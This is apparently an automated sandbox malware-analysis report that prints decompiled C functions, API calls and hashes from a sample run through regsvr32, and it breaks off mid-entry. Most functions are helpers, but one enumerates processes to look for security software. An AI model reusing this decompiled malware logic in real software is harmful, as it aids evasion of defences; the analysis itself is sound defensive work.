                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: memcpy$AllocateHeaplstrlen
                                                  • String ID:
                                                  • API String ID: 1819133394-0
                                                  • Opcode ID: 5e9142e1db7bbb34989c8894551a10a9ea55c3a423e8fa3c363c102f9928d110
                                                  • Instruction ID: ced82af0067707b28fc8ccd6fbbfceaa65850214aa37bcc66dcf2c6641e65ad6
                                                  • Opcode Fuzzy Hash: 5e9142e1db7bbb34989c8894551a10a9ea55c3a423e8fa3c363c102f9928d110
                                                  • Instruction Fuzzy Hash: E211C272A00214EFC7109B69DC88F9EBBAEEBC53A0B150266F50597290EB70DE04D7A4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C87A9A, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 53%
                                                  			E00C87A9A(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E00C86B43(_t8, _t1);
				_t16 = E00C82049(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E00C886D8(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E00C82049(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E00C89039(_t16);
				}
				return _t18;
			}









                                                  0x00c87aa5
                                                  0x00c87aa6
                                                  0x00c87aa9
                                                  0x00c87aab
                                                  0x00c87ab6
                                                  0x00c87aba
                                                  0x00c87abf
                                                  0x00c87ac3
                                                  0x00c87acb
                                                  0x00c87ad0
                                                  0x00c87ad8
                                                  0x00c87ad8
                                                  0x00c87ae1
                                                  0x00c87ae5
                                                  0x00c87aeb
                                                  0x00c87aee
                                                  0x00c87af4
                                                  0x00c87af4
                                                  0x00c87afc
                                                  0x00c87afc
                                                  0x00c87b03
                                                  0x00c87b03
                                                  0x00c87b0e

                                                  APIs
                                                    • Part of subcall function 00C82049: RtlAllocateHeap.NTDLL(00000000,00000000,00C87E50), ref: 00C82055
                                                    • Part of subcall function 00C886D8: wsprintfA.USER32 ref: 00C88734
                                                  • lstrlen.KERNEL32(00C823E9,00000000,00000000,00000027,00000005,00000000,00000000,00C896DA,74666F53,00000000,00C823E9,00C8D00C,?,00C823E9), ref: 00C87AD0
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00C87AF4
                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00C87AFC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                                  • String ID: Soft
                                                  • API String ID: 393707159-3753413193
                                                  • Opcode ID: 770ad192389903638c766a02b6f31d4a21ec526a987f95a1ca814cf25cd8cd99
                                                  • Instruction ID: 6ec6bbc70e11406a902d304f78e0d73602306a62eb74470f672b7cdff9b36e2d
                                                  • Opcode Fuzzy Hash: 770ad192389903638c766a02b6f31d4a21ec526a987f95a1ca814cf25cd8cd99
                                                  • Instruction Fuzzy Hash: 5601DF32100209A7C7127BA59C89AFF3B69EB8438DF144121F51555011EB35CA45E7A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C8757F, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E00C8757F() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0xc8d27c; // 0x41a5a8
						_t2 = _t9 + 0xc8ee54; // 0x73617661
						_push( &_v264);
						if( *0xc8d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                                  0x00c8758a
                                                  0x00c87594
                                                  0x00c87598
                                                  0x00c875a2
                                                  0x00c875d3
                                                  0x00c875a9
                                                  0x00c875ae
                                                  0x00c875bb
                                                  0x00c875c4
                                                  0x00c875db
                                                  0x00c875c6
                                                  0x00c875ce
                                                  0x00000000
                                                  0x00c875ce
                                                  0x00c875dc
                                                  0x00c875dd
                                                  0x00000000
                                                  0x00c875dd
                                                  0x00000000
                                                  0x00c875d7
                                                  0x00c875e3
                                                  0x00c875e8

                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C8758F
                                                  • Process32First.KERNEL32(00000000,?), ref: 00C875A2
                                                  • Process32Next.KERNEL32(00000000,?), ref: 00C875CE
                                                  • CloseHandle.KERNEL32(00000000), ref: 00C875DD
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 420147892-0
                                                  • Opcode ID: 9bcb6256dbc8a156fd240294f5a4560d02e31fa3c120d6a1010015965594686e
                                                  • Instruction ID: ad44033605451315a0e41a79648f935cb9554a3cfdcdba7f64dd88ee3780a650
                                                  • Opcode Fuzzy Hash: 9bcb6256dbc8a156fd240294f5a4560d02e31fa3c120d6a1010015965594686e
                                                  • Instruction Fuzzy Hash: 53F096326091255ADB20B7768D49FEB77ACDBC5759F100161F916D2040FB34CE498BAD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C87C61, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00C87C61(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                                  0x00c87c6b
                                                  0x00c87c6f
                                                  0x00c87c84
                                                  0x00c87c88
                                                  0x00c87c8b
                                                  0x00c87c91
                                                  0x00c87c95
                                                  0x00c87c98
                                                  0x00c87ca3
                                                  0x00c87c9a
                                                  0x00c87c9a
                                                  0x00c87c9a
                                                  0x00c87c98
                                                  0x00c87cb1

                                                  APIs
                                                  • memset.NTDLL ref: 00C87C6F
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 00C87C84
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00C87C91
                                                  • CloseHandle.KERNEL32(?), ref: 00C87CA3
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: CreateEvent$CloseHandlememset
                                                  • String ID:
                                                  • API String ID: 2812548120-0
                                                  • Opcode ID: 3da83269e24ec6d80da6222ef7badf315901ce673573edb17629cfe12b252ea3
                                                  • Instruction ID: 7cd039a44d4e5c6c9bba2ab3de8ebb6cd7a67b5a6b0f4ad5c2bc136df3ca089c
                                                  • Opcode Fuzzy Hash: 3da83269e24ec6d80da6222ef7badf315901ce673573edb17629cfe12b252ea3
                                                  • Instruction Fuzzy Hash: F8F05EF4104308BFE7106F22DCC0D2BBBACFB852D9B218A3DF05282101D632E8099BB4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 005E1850, Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E005E1850() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;
				void* _t12;

				_t8 =  *0x5e4130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x5e413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t12 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 > 0) {
						L5:
						 *0x5e412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x5e4128 = _t5;
						 *0x5e4130 = _t8;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x5e4124 = _t6;
						if(_t6 == 0) {
							 *0x5e4124 =  *0x5e4124 | 0xffffffff;
						}
						return 0;
					} else {
						_t12 = _t3 - _t3;
						goto L4;
					}
				}
			}










                                                  0x005e1851
                                                  0x005e185f
                                                  0x005e1867
                                                  0x005e186c
                                                  0x005e18be
                                                  0x005e18be
                                                  0x005e186e
                                                  0x005e1876
                                                  0x005e187e
                                                  0x005e187e
                                                  0x005e18ba
                                                  0x005e18bc
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x005e1878
                                                  0x005e187a
                                                  0x005e1880
                                                  0x005e1880
                                                  0x005e1885
                                                  0x005e1893
                                                  0x005e1898
                                                  0x005e189e
                                                  0x005e18a6
                                                  0x005e18ab
                                                  0x005e18ad
                                                  0x005e18ad
                                                  0x005e18b7
                                                  0x005e187c
                                                  0x005e187c
                                                  0x00000000
                                                  0x005e187c
                                                  0x005e187a

                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,005E164B,751463F0), ref: 005E185F
                                                  • GetVersion.KERNEL32 ref: 005E186E
                                                  • GetCurrentProcessId.KERNEL32 ref: 005E1885
                                                  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 005E189E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, Offset: 005E0000, based on PE: true
                                                  • Associated: 00000002.00000002.646415549.00000000005E5000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_5e0000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CreateCurrentEventOpenVersion
                                                  • String ID:
                                                  • API String ID: 845504543-0
                                                  • Opcode ID: eeb451900e402ef67cdd978023c692a9f8b798246efc076447d9263f15baafea
                                                  • Instruction ID: 5059b4cc2fb1cfd8fe89dd0a5c91c8a2abc454c790a3d130de01f2ae1f2fca80
                                                  • Opcode Fuzzy Hash: eeb451900e402ef67cdd978023c692a9f8b798246efc076447d9263f15baafea
                                                  • Instruction Fuzzy Hash: 07F08C31A442909BEB6CAF6ABC8DB943FA0F735722F000255E1C4DE1A0D370458AEF1C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C875E9, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 50%
                                                  			E00C875E9(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0xc8d32c; // 0x10a95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0xc8d32c; // 0x10a95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0xc8d030) {
					HeapFree( *0xc8d238, 0, _t8);
				}
				_t14[1] = E00C894A9(_v0, _t14);
				_t11 =  *0xc8d32c; // 0x10a95b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}










                                                  0x00c875e9
                                                  0x00c875e9
                                                  0x00c875f2
                                                  0x00c87602
                                                  0x00c87602
                                                  0x00c87607
                                                  0x00c8760c
                                                  0x00000000
                                                  0x00000000
                                                  0x00c875fc
                                                  0x00c875fc
                                                  0x00c8760e
                                                  0x00c87612
                                                  0x00c87624
                                                  0x00c87624
                                                  0x00c87634
                                                  0x00c87637
                                                  0x00c8763c
                                                  0x00c87640
                                                  0x00c87646

                                                  APIs
                                                  • RtlEnterCriticalSection.NTDLL(010A9570), ref: 00C875F2
                                                  • Sleep.KERNEL32(0000000A,?,00C823DE), ref: 00C875FC
                                                  • HeapFree.KERNEL32(00000000,00000000,?,00C823DE), ref: 00C87624
                                                  • RtlLeaveCriticalSection.NTDLL(010A9570), ref: 00C87640
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                  • String ID:
                                                  • API String ID: 58946197-0
                                                  • Opcode ID: 12f0de81a780255d3ebd43c045d88a1d25a94b97e70c14d174ff8130d296143c
                                                  • Instruction ID: 6e1606e4df2e8eaf9ce47326b5e62771e5d62deee95aeeaf246b6603b2ca7fd7
                                                  • Opcode Fuzzy Hash: 12f0de81a780255d3ebd43c045d88a1d25a94b97e70c14d174ff8130d296143c
                                                  • Instruction Fuzzy Hash: CDF0D470604641DBE714AB69DC89F1A77E8EF14785B148419F813D72B1E730ED41DB2E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C8970F, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00C8970F() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0xc8d26c; // 0x2c8
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0xc8d2b8; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0xc8d26c; // 0x2c8
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xc8d238; // 0xcb0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                                  0x00c8970f
                                                  0x00c89716
                                                  0x00c89760
                                                  0x00c89762
                                                  0x00c89762
                                                  0x00c8971a
                                                  0x00c89720
                                                  0x00c89725
                                                  0x00c89729
                                                  0x00c8972f
                                                  0x00c89736
                                                  0x00000000
                                                  0x00000000
                                                  0x00c89738
                                                  0x00c8973d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00c8973d
                                                  0x00c8973f
                                                  0x00c89747
                                                  0x00c8974a
                                                  0x00c8974a
                                                  0x00c89750
                                                  0x00c89757
                                                  0x00c8975a
                                                  0x00c8975a
                                                  0x00000000

                                                  APIs
                                                  • SetEvent.KERNEL32(000002C8,00000001,00C88099), ref: 00C8971A
                                                  • SleepEx.KERNEL32(00000064,00000001), ref: 00C89729
                                                  • CloseHandle.KERNEL32(000002C8), ref: 00C8974A
                                                  • HeapDestroy.KERNEL32(00CB0000), ref: 00C8975A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: CloseDestroyEventHandleHeapSleep
                                                  • String ID:
                                                  • API String ID: 4109453060-0
                                                  • Opcode ID: d0f1b13a06600737d153ad2f08349fbc7468c9a1b27d794e0a2208e755fabf6d
                                                  • Instruction ID: 82c3e72d36cebe90d7c02c3c6570fab848581d13cc1a0a1a929bf88e5610c2d3
                                                  • Opcode Fuzzy Hash: d0f1b13a06600737d153ad2f08349fbc7468c9a1b27d794e0a2208e755fabf6d
                                                  • Instruction Fuzzy Hash: 50F03035715311DBD7207F75AD88B2A37A8EB007A5B080610B827E72E0DB34DD40E76C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C8A5D6, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 37%
                                                  			E00C8A5D6() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0xc8d32c; // 0x10a95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0xc8d32c; // 0x10a95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0xc8d32c; // 0x10a95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0xc8e836) {
					HeapFree( *0xc8d238, 0, _t10);
					_t7 =  *0xc8d32c; // 0x10a95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                                  0x00c8a5d6
                                                  0x00c8a5df
                                                  0x00c8a5ef
                                                  0x00c8a5ef
                                                  0x00c8a5f4
                                                  0x00c8a5f9
                                                  0x00000000
                                                  0x00000000
                                                  0x00c8a5e9
                                                  0x00c8a5e9
                                                  0x00c8a5fb
                                                  0x00c8a600
                                                  0x00c8a604
                                                  0x00c8a617
                                                  0x00c8a61d
                                                  0x00c8a61d
                                                  0x00c8a626
                                                  0x00c8a628
                                                  0x00c8a62c
                                                  0x00c8a632

                                                  APIs
                                                  • RtlEnterCriticalSection.NTDLL(010A9570), ref: 00C8A5DF
                                                  • Sleep.KERNEL32(0000000A,?,00C823DE), ref: 00C8A5E9
                                                  • HeapFree.KERNEL32(00000000,?,?,00C823DE), ref: 00C8A617
                                                  • RtlLeaveCriticalSection.NTDLL(010A9570), ref: 00C8A62C
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                  • String ID:
                                                  • API String ID: 58946197-0
                                                  • Opcode ID: 6dcb9bb48af6cd4940b425256a46e17a87c76320efc4ed1d8e5c4e5d7fa8019b
                                                  • Instruction ID: 03116afdaf1316a538503ec83ff7f50ab96119f3185a1d45a4dc7c430ee63a57
                                                  • Opcode Fuzzy Hash: 6dcb9bb48af6cd4940b425256a46e17a87c76320efc4ed1d8e5c4e5d7fa8019b
                                                  • Instruction Fuzzy Hash: 81F06274600140DBE718AB65DC99B1D77B5EB08746B44801AF913DB2B0D730EC50DB2E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C87F27, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 58%
                                                  			E00C87F27(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E00C82049(_t2);
				if(_t34 != 0) {
					_t30 = E00C82049(_t28);
					if(_t30 == 0) {
						E00C89039(_t34);
					} else {
						_t39 = _a4;
						_t22 = E00C8A911(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E00C8A911(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                                  0x00c87f27
                                                  0x00c87f31
                                                  0x00c87f33
                                                  0x00c87f39
                                                  0x00c87f39
                                                  0x00c87f42
                                                  0x00c87f46
                                                  0x00c87f52
                                                  0x00c87f56
                                                  0x00c87fca
                                                  0x00c87f58
                                                  0x00c87f58
                                                  0x00c87f5c
                                                  0x00c87f63
                                                  0x00c87f66
                                                  0x00c87f80
                                                  0x00c87f6f
                                                  0x00c87f6f
                                                  0x00c87f73
                                                  0x00c87f76
                                                  0x00c87f7b
                                                  0x00c87f7b
                                                  0x00c87f85
                                                  0x00c87fad
                                                  0x00c87fb3
                                                  0x00c87fb6
                                                  0x00c87f87
                                                  0x00c87f89
                                                  0x00c87f91
                                                  0x00c87f9c
                                                  0x00c87fa1
                                                  0x00c87fa1
                                                  0x00c87fbd
                                                  0x00c87fc4
                                                  0x00c87fc5
                                                  0x00c87fc5
                                                  0x00c87f56
                                                  0x00c87fd5

                                                  APIs
                                                  • lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,00C815A4,?,?,?,?,00000102,00C811DA,?,?,00000000), ref: 00C87F33
                                                    • Part of subcall function 00C82049: RtlAllocateHeap.NTDLL(00000000,00000000,00C87E50), ref: 00C82055
                                                    • Part of subcall function 00C8A911: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00C87F61,00000000,00000001,00000001,?,?,00C815A4,?,?,?,?,00000102), ref: 00C8A91F
                                                    • Part of subcall function 00C8A911: StrChrA.SHLWAPI(?,0000003F,?,?,00C815A4,?,?,?,?,00000102,00C811DA,?,?,00000000,00000000), ref: 00C8A929
                                                  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00C815A4,?,?,?,?,00000102,00C811DA,?), ref: 00C87F91
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00C87FA1
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00C87FAD
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 3767559652-0
                                                  • Opcode ID: 8a307576ccab7714eeb605a91993aed881541a9e5e6802968d6a60ff4c74e86e
                                                  • Instruction ID: b9c9f2e82e7b69746d113170dae0f3d719cf7e08cc8c995a1e875e4e1b516a58
                                                  • Opcode Fuzzy Hash: 8a307576ccab7714eeb605a91993aed881541a9e5e6802968d6a60ff4c74e86e
                                                  • Instruction Fuzzy Hash: C121C072408225EBCB02AFE6DC84BAFBFA99F45388B254055FA049B211E735CA0097A4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C87CB8, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00C87CB8(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E00C82049(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                                  0x00c87ccd
                                                  0x00c87cd1
                                                  0x00c87cdb
                                                  0x00c87ce2
                                                  0x00c87ce5
                                                  0x00c87ce7
                                                  0x00c87cef
                                                  0x00c87cf4
                                                  0x00c87d02
                                                  0x00c87d07
                                                  0x00c87d11

                                                  APIs
                                                  • lstrlenW.KERNEL32(004F0053,75145520,?,00000008,010A937C,?,00C8747C,004F0053,010A937C,?,?,?,?,?,?,00C86814), ref: 00C87CC8
                                                  • lstrlenW.KERNEL32(00C8747C,?,00C8747C,004F0053,010A937C,?,?,?,?,?,?,00C86814), ref: 00C87CCF
                                                    • Part of subcall function 00C82049: RtlAllocateHeap.NTDLL(00000000,00000000,00C87E50), ref: 00C82055
                                                  • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,00C8747C,004F0053,010A937C,?,?,?,?,?,?,00C86814), ref: 00C87CEF
                                                  • memcpy.NTDLL(751469A0,00C8747C,00000002,00000000,004F0053,751469A0,?,?,00C8747C,004F0053,010A937C), ref: 00C87D02
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: lstrlenmemcpy$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 2411391700-0
                                                  • Opcode ID: f11f268c371622f90b8d6c2830d67cb25210aa85c0282334d9ef30495bcdacf1
